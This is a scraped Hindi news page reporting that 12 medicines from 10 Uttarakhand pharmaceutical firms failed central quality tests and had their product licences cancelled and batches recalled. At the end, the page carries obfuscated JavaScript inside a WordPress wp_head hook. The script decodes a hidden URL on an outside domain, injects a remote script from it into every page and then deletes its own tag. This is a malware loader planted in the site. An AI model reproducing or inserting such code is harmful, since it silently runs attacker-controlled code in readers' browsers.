Tuesday, June 25, 2024
spot_img

उत्तराखंड की 10 फार्मा कंपनियों की 12 दवाइयों के सैंपल फेल! ड्रग्स कंट्रोलर ने उत्पाद लाइसेंस किए निरस्त

देशभर में पिछले कुछ सालों से नकली दवाओं का कारोबार तेजी से बढ़ता जा रहा है जिसको देखते हुए केंद्रीय दवा मानक नियंत्रण संगठन हर महीने दवाओं का सैंपल लेकर रिपोर्ट जारी कर रहा है। इसी क्रम में केंद्रीय दवा मानक नियंत्रण संगठन ने अप्रैल महीने में तमाम फार्मा कंपनियों की दवाइयों के सैंपल लिए थे। जिसमें से 50 दवाईयां गुणवत्ता मानकों के अनुरूप नहीं पाई गई हैं। जिससे केंद्रीय दवा मानक नियंत्रण संगठन ने इन सभी दवाईयां को लेकर अलर्ट जारी किया है। जिसकी जानकारी केंद्रीय दवा मानक नियंत्रण संगठन की वेबसाइट पर अपलोड की गई है। जारी किए गए अलर्ट के अनुसार जिन दवाइयों के सैंपल फेल हुए हैं उसमें से 12 दवाइयों की कंपनियां उत्तराखंड में स्थित हैं।

इससे पिछले महीने यानी मार्च में लिए गए दवाओं के सैंपल में उत्तराखंड में बनी 11 दवाओं के सैंपल फेल हुए थे। अप्रैल में उत्तराखंड की 12 दवाओं के सैंपल फेल होने के बाद केंद्रीय दवा मानक नियंत्रण संगठन ने उत्तराखंड ड्रग्स कंट्रोल विभाग को पत्र भेजकर अलर्ट जारी किया है। इसके बाद उत्तराखंड ड्रग्स कंट्रोल विभाग ने संबंधित कंपनियों के उत्पाद लाइसेंस को निरस्त करते हुए बाजार से वापस मंगा लिया है ताकि इन दवाओं के इस्तेमाल न हो सके। ड्रग्स कंट्रोलर ताजबर सिंह ने बताया कि केंद्रीय दवा मानक नियंत्रण संगठन से अलर्ट मिलने के बाद ही इन 12 दवाओं से संबंधित कंपनियों के लाइसेंस को रद्द कर दिया गया है। साथ ही जनता इन दवाओं का इस्तेमाल न कर सके इसलिए संबंधित कंपनियों को इस बाबत निर्देश दिए गए थे कि जिस बैच की दवाओं का सैंपल हुआ है उन दवाओं को बाजार से वापस मंगा लिया जाए। वहीं जिन 12 दवाओं के सैंपल फेल हुए हैं। उन दवाओं की फार्मा कंपनियां देहरादून, हरिद्वार और उधमसिंह नगर में स्थित हैं।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>